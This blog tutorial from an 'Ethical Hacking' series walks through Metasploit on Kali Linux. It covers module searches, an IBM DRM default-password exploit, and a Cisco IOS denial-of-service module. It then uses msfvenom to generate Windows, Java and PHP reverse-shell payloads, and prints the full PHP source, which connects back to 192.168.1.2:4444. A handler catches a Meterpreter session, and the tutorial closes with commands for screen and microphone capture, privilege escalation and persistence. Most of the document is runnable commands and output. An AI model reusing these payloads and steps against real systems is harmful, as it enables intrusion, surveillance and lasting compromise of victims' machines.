Home TechnologyCybersecurity Ethical Hacking Fridays: How to Hack (Part 7) Metasploit Penetration Testing

Ethical Hacking Fridays: How to Hack (Part 7) Metasploit Penetration Testing

by Ivan
Ethical Hacking: How to Hack using Metasploit Penetration Testing Framework.

Ethical Hacking: How to Hack using Metasploit Penetration Testing Framework.

Metasploit is a very powerful open source penetration testing framework. It offers information about software vulnerabilities, IDS signature development, and penetration testing. This tool can be used to execute and develop exploit code against a remote target device. Metasploit is not illegal itself but it really depends on what you use it for.

For this article, you will need to have Kali Linux installed and running. To do so, you can follow my story, “Ethical Hacking (Part 2): Introducing Kali Linux”. Metasploit comes bundled with Kali Linux as standard. If you are not using Kali Linux you can still download and install Metasploit from here.

Let’s get started…

It’s a good idea to make sure Metasploit is up to date. It is recommended to check this fairly often, recommended weekly.

kali@kali:~$ sudo apt update -y; sudo apt install metasploit-framework -y

Launch the Metasploit console like this.

kali@kali:~$ msfconsole , , / \ ((__---,,,---__)) (_) O O (_)_________ \ _ / |\ o_o \ M S F | \ \ _____ | * ||| WW||| ||| ||| =[ metasploit v5.0.101-dev ] + -- --=[ 2049 exploits - 1108 auxiliary - 344 post ] + -- --=[ 562 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ] Metasploit tip: To save all commands executed since start up to a file, use the makerc command msf5>

In the console you can always ask for help.

msf5 > help

You are able to search for modules based on your target.

msf5 > search cisco

Actually this is probably a good time to take a quick detour and cover an essential part of ethical hacking and penetration testing and that is information gathering. There are a number of tools available but Nmap is probably your test starting point.

kali@kali:~$ nmap -p- -A localhost
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-15 16:24 BST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000045s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3p1 Debian 1 (protocol 2.0)
| ssh-hostkey:
| 3072 d3:21:10:b8:02:14:5e:13:de:15:98:8f:a8:a9:5a:2a (RSA)
| 256 c7:54:c4:44:5b:cf:68:f3:29:9a:16:b1:17:ca:99:75 (ECDSA)
|_ 256 05:f0:7b:8d:52:c5:42:56:f9:b2:30:44:92:50:f6:59 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds

Nmap allows you to scan a host to identify it but also to find out what services is it serving. With this information you can then either go to the Exploit Database or search for modules in Metasploit. I just scanned my local Kali instance and I can see that an SSH server is enabled.

msf5 > search linuxmsf5 > search ssh

… and this is for “ssh” alone. Almost everything you can think of will return results in Metasploit.

If you type “help <command>”, for example “help search” it provides you with a lot of useful information on how to use the command. For example you may not know that you are able to filter your searches as well which is explained in the help.

Examples:
search cve:2009 type:exploit
search cve:2009 type:exploit platform:-linux

Let’s try this…

msf5 > search cve:2020 type:exploit platform:-linux ssh

We are looking for SSH exploits on the Linux platform in 2020.

So what does this actually do?

msf5> info exploit/linux/ssh/ibm_drm_a3userName: IBM Data Risk Manager a3user Default Password Module: exploit/linux/ssh/ibm_drm_a3user Platform: Unix Arch: cmd Privileged: Yes License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2020-04-21Provided by: Pedro Ribeiro <pedrib@gmail.com>Available targets: Id Name -- ---- 0 IBM Data Risk Manager <= 2.0.6.1Check supported: NoBasic options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD idrm yes Password to login with RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 22 yes The target port USERNAME a3user yes Username to login withPayload information:Description: This module abuses a known default password in IBM Data Risk Manager. The 'a3user' has the default password 'idrm' and allows an attacker to log in to the virtual appliance via SSH. This can be escalate to full root access, as 'a3user' has sudo access with the default password. At the time of disclosure this was an 0day, but it was later confirmed and patched by IBM. Versions <= 2.0.6.1 are confirmed to be vulnerable.References: https://cvedetails.com/cve/CVE-2020-4429/ https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md https://seclists.org/fulldisclosure/2020/Apr/33 https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/

Time to exploit!

Although this has nothing to do with my Kali Linux SSH server we will continue to use it as an example. The next step is to tell Metasploit we want to use this exploit.

msf5 > use exploit/linux/ssh/ibm_drm_a3user
[*] No payload configured, defaulting to cmd/unix/interact
msf5 exploit(linux/ssh/ibm_drm_a3user) >

Now we need to configure the options…

msf5 exploit(linux/ssh/ibm_drm_a3user) > optionsModule options (exploit/linux/ssh/ibm_drm_a3user):Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD idrm yes Password to login with
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
USERNAME a3user yes Username to login withPayload options (cmd/unix/interact):Name Current Setting Required Description
---- --------------- -------- -----------Exploit target:Id Name
-- ----
0 IBM Data Risk Manager <= 2.0.6.1

Now we use the “set” command to set the various options.

msf5 exploit(linux/ssh/ibm_drm_a3user) > set RHOSTS localhost
RHOSTS => localhost

Once you have set all your desired options just run “exploit”.

msf5 exploit(linux/ssh/ibm_drm_a3user) > exploit
[*] Exploiting target 0.0.0.1[*] 0.0.0.1:22 - Attempting to log in to the IBM Data Risk Manager appliance...

That is pretty crazy!

The “search” functionality in Metasploit is pretty powerful but there is another way to find out what is available.

What other exploit modules are available?

There are two ways of finding this out. The first way is to run “banner” again from the “msfconsole”.

msf5> banner # cowsay++ ____________ < metasploit> ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v5.0.101-dev ] + -- --=[ 2049 exploits - 1108 auxiliary - 344 post ] + -- --=[ 562 payloads - 45 encoders - 10 nops ] + -- --=[ 7 evasion ]Metasploit tip: You can use help to view all available commands

As you can see there are 2049 exploits, 1108 auxiliary, 344 post, 562 payloads, 45 encoders, 10 nops and 7 evasions at the time of writing this article.

The second way is to exit the “msfconsole” and browse to the Metasploit framework “modules” directory.

kali@kali:~$ ls -l /usr/share/metasploit-framework/modules/exploits
total 100
drwxr-xr-x 3 root root 4096 Oct 1 14:35 aix
drwxr-xr-x 6 root root 4096 Oct 1 14:00 android
drwxr-xr-x 5 root root 4096 Oct 1 14:00 apple_ios
drwxr-xr-x 3 root root 4096 Oct 1 14:00 bsd
drwxr-xr-x 3 root root 4096 Oct 1 14:00 bsdi
drwxr-xr-x 3 root root 4096 Oct 1 14:00 dialup
-rw-r--r-- 1 root root 6491 Jul 29 23:36 example_linux_priv_esc.rb
-rw-r--r-- 1 root root 2700 Jul 29 23:36 example.rb
-rw-r--r-- 1 root root 6396 Jul 29 23:36 example_webapp.rb
drwxr-xr-x 3 root root 4096 Oct 1 14:00 firefox
drwxr-xr-x 9 root root 4096 Oct 1 14:00 freebsd
drwxr-xr-x 3 root root 4096 Oct 1 14:00 hpux
drwxr-xr-x 3 root root 4096 Oct 1 14:00 irix
drwxr-xr-x 23 root root 4096 Oct 1 14:00 linux
drwxr-xr-x 3 root root 4096 Oct 1 14:00 mainframe
drwxr-xr-x 27 root root 4096 Oct 1 14:35 multi
drwxr-xr-x 4 root root 4096 Oct 1 14:00 netware
drwxr-xr-x 3 root root 4096 Oct 1 14:00 openbsd
drwxr-xr-x 13 root root 4096 Oct 1 14:00 osx
drwxr-xr-x 4 root root 4096 Oct 1 14:00 qnx
drwxr-xr-x 8 root root 4096 Oct 1 14:00 solaris
drwxr-xr-x 14 root root 4096 Oct 1 14:00 unix
drwxr-xr-x 52 root root 4096 Oct 1 14:00 windows

Or maybe something more specific like “firefox” exploits.

kali@kali:~$ ls -l /usr/share/metasploit-framework/modules/exploits/firefox/local
total 4
-rw-r--r-- 1 root root 1893 Jul 29 23:36 exec_shellcode.rb

And this is how it is used in Metasploit.

msf5 > info exploit/firefox/local/exec_shellcodeName: Firefox Exec Shellcode from Privileged Javascript Shell
Module: exploit/firefox/local/exec_shellcode
Platform: Firefox
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2014-03-10Provided by:
joev <joev@metasploit.com>Available targets:
Id Name
-- ----
0 Native PayloadCheck supported:
NoBasic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
TIMEOUT 90 yes Maximum time (seconds) to wait for a responsePayload information:Description:
This module allows execution of native payloads from a privileged
Firefox Javascript shell. It places the specified payload into
memory, adds the necessary protection flags, and calls it, which can
be useful for upgrading a Firefox javascript shell to a Meterpreter
session without touching the disk.msf5 > use exploit/firefox/local/exec_shellcode
[*] No payload configured, defaulting to linux/aarch64/meterpreter/reverse_tcp

What non-exploit modules are available?

Any non-exploit module in Metasploit is called an auxiliary and does not come with a payload whereas exploits come with a payload. Auxiliary modules are a feature of the framework allowing it to extend for a variety of purposes other than exploitation. For example let us look at the Denial-of-Service (DoS) auxiliary.

kali@kali:~$ ls -l /usr/share/metasploit-framework/modules/auxiliary
total 100
drwxr-xr-x 46 root root 4096 Oct 1 14:00 admin
drwxr-xr-x 2 root root 4096 Oct 1 14:35 analyze
drwxr-xr-x 2 root root 4096 Oct 1 14:35 bnat
drwxr-xr-x 8 root root 4096 Oct 1 14:35 client
drwxr-xr-x 3 root root 4096 Oct 1 14:00 cloud
drwxr-xr-x 2 root root 4096 Oct 1 14:35 crawler
drwxr-xr-x 2 root root 4096 Oct 1 14:35 docx
drwxr-xr-x 27 root root 4096 Oct 1 14:00 dos
-rw-r--r-- 1 root root 1490 Jul 29 23:36 example.rb
drwxr-xr-x 2 root root 4096 Oct 1 14:35 fileformat
drwxr-xr-x 10 root root 4096 Oct 1 14:00 fuzzers
drwxr-xr-x 2 root root 20480 Oct 1 14:35 gather
drwxr-xr-x 2 root root 4096 Oct 1 14:35 parser
drwxr-xr-x 3 root root 4096 Oct 1 14:00 pdf
drwxr-xr-x 86 root root 4096 Oct 1 14:00 scanner
drwxr-xr-x 4 root root 4096 Oct 1 14:35 server
drwxr-xr-x 2 root root 4096 Oct 1 14:35 sniffer
drwxr-xr-x 9 root root 4096 Oct 1 14:00 spoof
drwxr-xr-x 4 root root 4096 Oct 1 14:00 sqli
drwxr-xr-x 2 root root 4096 Oct 1 14:35 voip
drwxr-xr-x 5 root root 4096 Oct 1 14:00 vsploitkali@kali:~$ ls -l /usr/share/metasploit-framework/modules/auxiliary/dos
total 100
drwxr-xr-x 2 root root 4096 Oct 1 14:35 android
drwxr-xr-x 2 root root 4096 Oct 1 14:35 apple_ios
drwxr-xr-x 2 root root 4096 Oct 1 14:35 cisco
drwxr-xr-x 2 root root 4096 Oct 1 14:35 dhcp
drwxr-xr-x 2 root root 4096 Oct 1 14:35 dns
drwxr-xr-x 3 root root 4096 Oct 1 14:00 freebsd
drwxr-xr-x 2 root root 4096 Oct 1 14:35 hp
drwxr-xr-x 2 root root 4096 Oct 1 14:35 http
drwxr-xr-x 2 root root 4096 Oct 1 14:35 mdns
drwxr-xr-x 2 root root 4096 Oct 1 14:35 misc
drwxr-xr-x 2 root root 4096 Oct 1 14:35 ntp
drwxr-xr-x 2 root root 4096 Oct 1 14:35 pptp
drwxr-xr-x 2 root root 4096 Oct 1 14:35 rpc
drwxr-xr-x 2 root root 4096 Oct 1 14:35 samba
drwxr-xr-x 2 root root 4096 Oct 1 14:35 sap
drwxr-xr-x 2 root root 4096 Oct 1 14:35 scada
drwxr-xr-x 2 root root 4096 Oct 1 14:35 smb
drwxr-xr-x 2 root root 4096 Oct 1 14:35 smtp
drwxr-xr-x 3 root root 4096 Oct 1 14:00 solaris
drwxr-xr-x 2 root root 4096 Oct 1 14:35 ssl
drwxr-xr-x 2 root root 4096 Oct 1 14:35 syslog
drwxr-xr-x 2 root root 4096 Oct 1 14:35 tcp
drwxr-xr-x 2 root root 4096 Oct 1 14:35 upnp
drwxr-xr-x 14 root root 4096 Oct 1 14:00 windows
drwxr-xr-x 2 root root 4096 Oct 1 14:35 wireshark

And maybe more specifically Cisco DoS modules?

kali@kali:~$ ls -l /usr/share/metasploit-framework/modules/auxiliary/dos/cisco
total 8
-rw-r--r-- 1 root root 1876 Jul 29 23:36 ios_http_percentpercent.rb
-rw-r--r-- 1 root root 1764 Jul 29 23:36 ios_telnet_rocem.rb

That IOS HTTP Percent module sounds interesting?

msf5 > info auxiliary/dos/cisco/ios_http_percentpercentName: Cisco IOS HTTP GET /%% Request Denial of Service
Module: auxiliary/dos/cisco/ios_http_percentpercent
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2000-04-26Provided by:
aushack <patrick@osisecurity.com.au>Check supported:
NoBasic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)Description:
This module triggers a Denial of Service condition in the Cisco IOS
HTTP server. By sending a GET request for "/%%", the device becomes
unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This
module tested successfully against a Cisco 1600 Router IOS
v11.2(18)P.References:
http://www.securityfocus.com/bid/1154
https://cvedetails.com/cve/CVE-2000-0380/
OSVDB (1302)msf5 > use auxiliary/dos/cisco/ios_http_percentpercentmsf5 auxiliary(dos/cisco/ios_http_percentpercent) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1msf5 auxiliary(dos/cisco/ios_http_percentpercent) > exploit
[*] Running module against 127.0.0.1[-] 127.0.0.1:80 - Auxiliary failed: Rex::ConnectionRefused The connection was refused by the remote host (127.0.0.1:80).
[-] 127.0.0.1:80 - Call stack:
[-] 127.0.0.1:80 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.23/lib/rex/socket/comm/local.rb:298:in `rescue in create_by_type'
[-] 127.0.0.1:80 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.23/lib/rex/socket/comm/local.rb:263:in `create_by_type'
[-] 127.0.0.1:80 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.23/lib/rex/socket/comm/local.rb:33:in `create'
[-] 127.0.0.1:80 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.23/lib/rex/socket.rb:49:in `create_param'
[-] 127.0.0.1:80 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.23/lib/rex/socket/tcp.rb:37:in `create_param'
[-] 127.0.0.1:80 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-socket-0.1.23/lib/rex/socket/tcp.rb:28:in `create'
[-] 127.0.0.1:80 - /usr/share/metasploit-framework/lib/msf/core/exploit/tcp.rb:106:in `connect'
[-] 127.0.0.1:80 - /usr/share/metasploit-framework/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb:37:in `run'
[*] Auxiliary module execution completed

You may be wondering how you exit a context.

msf5 auxiliary(dos/cisco/ios_http_percentpercent) > back
msf5 >

Reverse Shell Client (“Victim”)

Most fully patched systems with antivirus software will detect and quarantine reverse shells. I guess this should act as a warning to make sure you keep your system(s) up to date and have virus scanner software and I’ll show you why.

We are going to use an exploit called “meterpreter”.

msf5 > search meterpreter

You will notice Metasploit “meterpreter” is able to create a reverse shell for many platforms including Avoid, Apple iOS, FreeBSD, Java, Linux, OSX, PHP, Python, Windows and much much more.

Just to list a few…

payload/python/meterpreter/reverse_tcp
payload/android/meterpreter/reverse_tcp
apple_ios/aarch64/meterpreter_reverse_tcp
java/meterpreter/reverse_tcp
linux/aarch64/meterpreter_reverse_tcp
linux/armbe/meterpreter_reverse_tcp
linux/mips64/meterpreter_reverse_tcp
linux/mipsbe/meterpreter_reverse_tcp
linux/mipsle/meterpreter/reverse_tcp
linux/mipsle/meterpreter_reverse_tcp
linux/ppc/meterpreter_reverse_tcp
linux/ppc64le/meterpreter_reverse_tcp
linux/ppce500v2/meterpreter_reverse_tcp
linux/x64/meterpreter_reverse_tcp
linux/x86/meterpreter_reverse_tcp
linux/zarch/meterpreter_reverse_tcp
osx/x64/meterpreter_reverse_tcp
php/meterpreter_reverse_tcp
python/meterpreter_reverse_tcp
windows/meterpreter_reverse_tcp
windows/x64/meterpreter_reverse_tcp

The Venom (msfvenom) documentation seems to use Windows as an example.

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe -o payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: payload.exe

I don’t have a Windows system so going to try this out using Java.

kali@kali:~$ msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f jar -o runme.jar
Payload size: 5307 bytes
Final size of jar file: 5307 bytes
Saved as: runme.jar

Or as another option maybe PHP.

kali@kali:~$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw -o runme.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1112 bytes
Saved as: runme.php

The nice thing about the PHP option is you can actually see the code it is creating in the exploit by running Linux “cat” on the file.

/*<?php /**/ error_reporting(0); $ip = '192.168.1.2'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

So just to be clear the Windows (payload.exe), Java (runme.jar), and PHP (runme.php) are extremely bad to run. This is what would be run/installed on the victims device.

Reverse Shell Server (“Attacker”)

The next step is to configure and start your reverse shell server.

msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcpmsf5 exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > show optionsModule options (exploit/multi/handler):Name Current Setting Required Description
---- --------------- -------- -----------Payload options (java/meterpreter/reverse_tcp):Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen portExploit target:Id Name
-- ----
0 Wildcard Targetmsf5 exploit(multi/handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444msf5 exploit(multi/handler) > show optionsModule options (exploit/multi/handler):Name Current Setting Required Description
---- --------------- -------- -----------Payload options (java/meterpreter/reverse_tcp):Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen portExploit target:Id Name
-- ----
0 Wildcard Targetmsf5 exploit(multi/handler) > exploit[*] Started reverse TCP handler on 192.168.1.2:4444

So what did we do here….

  • Started configuring a generic TCP reverse shell
  • Set the payload java/meterpreter/reverse_tcp
  • Had a look at the options and what we need to set
  • Set the LHOST and LPORT
  • Checked the options were properly set
  • Started the exploit to listen on 192.168.1.2:4444

In another terminal I can see that Kali is listening on TCP 4444 now.

kali@kali:~$ netstat -antup | grep :4444
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 192.168.1.2:4444 0.0.0.0:* LISTEN 63774/ruby

I found my exploit in my Kali home directory (runme.jar) and gave it execute permissions and ran it.

kali@kali:~$ chmod +x runme.jar 
kali@kali:~$ ./runme.jar
kali@kali:~$

You would expect to see “runme.jar” running right?

kali@kali:~$ ps aux | grep runme
kali 63963 0.0 0.0 6112 644 pts/2 S+ 22:54 0:00 grep --color=auto runme

Seems like nothing happened right? Or did it?

kali@kali:~$ lsof -i :4444
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
ruby 63774 kali 8u IPv4 170341 0t0 TCP 192.168.1.2:4444->192.168.1.2:56226 (ESTABLISHED)
java 63940 kali 7u IPv6 170614 0t0 TCP 192.168.1.2:56226->192.168.1.2:4444 (ESTABLISHED)

Let’s check out Metasploit console.

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Sending stage (53944 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:56226) at 2020-10-15 22:53:28 +0100meterpreter >

This is the crazy part…

meterpreter > shell
Process 1 created.
Channel 1 created.ls -la ~/runme.jar
-rwxr-xr-x 1 kali kali 5307 Oct 15 22:33 /home/kali/runme.jar

Although I can not see the prompt I have a shell back to the victim system and was able to locate the “runme.jar” file. Try creating a file or directory and you will see it created on the victim system.

You are able to terminate the shell by pressing Ctrl+C.

Terminate channel 1? [y/N] y
meterpreter >

It is possible to “background” your meterpreter session.

meterpreter > background

You are able to show the current sessions and re-access any of the sessions as below.

msf5 exploit(multi/handler) > show sessionsActive sessions
===============Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter java/linux kali @ kali 192.168.1.2:4444 -> 192.168.1.2:56226 (192.168.1.2)msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...meterpreter >

I mean it will give you sleepless nights knowing what an attacker can do with a reverse shell on your system. Access your webcam, microphone, view your desktop, screenshots, uploading files, play audio files, etc. All really bad things, so that is why it is so important to only open software from trustworthy sources and also make sure your system is fully up to date and has a virus scanner on it.

Here are just a few options…

meterpreter > helpStdapi: Networking Commands
===========================Command Description
------- -----------
ifconfig Display interfaces
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing tableStdapi: System Commands
=======================Command Description
------- -----------
execute Execute a command
getenv Get one or more environment variable values
getuid Get the user that the server is running as
localtime Displays the target system's local date and time
pgrep Filter processes by name
ps List running processes
shell Drop into a system command shell
sysinfo Gets information about the remote system, such as OSStdapi: User interface Commands
===============================Command Description
------- -----------
keyevent Send key events
mouse Send mouse events
screenshare Watch the remote user's desktop in real time
screenshot Grab a screenshot of the interactive desktopStdapi: Webcam Commands
=======================Command Description
------- -----------
record_mic Record audio from the default microphone for X secondsStdapi: Audio Output Commands
=============================Command Description
------- -----------
play play a waveform audio file (.wav) on the target system

The list of options will be dependant on what system you are accessing. I’m using my Kali Linux virtual machine so the webcam options are missing but if you were accessing a Windows host for example you would see them there.

The exploit will be running as the user that ran it. In order to fully access the machine you will need to escalate your privileges.

For example if your target is Windows you have a lot of options…

msf5 exploit(multi/handler) > use post/windows/escalate/
use post/windows/escalate/droplnk use post/windows/escalate/golden_ticket use post/windows/escalate/screen_unlock
use post/windows/escalate/getsystem use post/windows/escalate/ms10_073_kbdlayout use post/windows/escalate/unmarshal_cmd_exec

You also could always ask the victim to gain full access? :S

msf5 exploit(multi/handler) > use exploit/windows/local/ask

There don’t seem to be as many “fun” options for Linux based systems. If the target is a Windows user you could have a field day on their system.

These reverse shells are not persistent. This means if the system reboots it will not longer be running and you will need the victim to run it again.

meterpreter > run persistence -h[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.OPTIONS:-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back

As per the example on a Windows machine to make the reverse shell persistent you can run this.

meterpreter > run exploit/windows/local/persistence OPTION=X

You may also like

Leave a Reply

[script_16]